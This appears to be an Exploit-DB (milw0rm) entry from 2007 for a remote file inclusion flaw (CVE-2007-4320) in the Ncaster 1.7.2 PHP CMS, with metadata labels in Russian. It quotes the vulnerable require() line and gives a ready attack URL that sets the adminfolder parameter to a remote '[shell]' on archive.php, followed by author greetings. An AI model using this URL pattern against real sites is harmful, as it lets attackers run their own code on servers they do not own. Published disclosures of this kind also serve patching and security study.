Exploit Ncaster 1.7.2 - 'archive.php' Remote File Inclusion

[Exploiter]

EDB-ID

4273

Проверка EDB

1. Пройдено

Автор

K1N9K0NG

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-4320

Дата публикации

2007-08-09

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Ncaster 1.7.2
Discovered By   : k1n9k0ng
Scripts site    : http://ncastercms.com/downloads/ncaster172.zip
Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
require("$adminfolder/sources/datelib.php");

bug found:
"http://www.site.net/ncaster/admin/addons/archive/archive.php?adminfolder=[shell]"

# milw0rm.com [2007-08-09]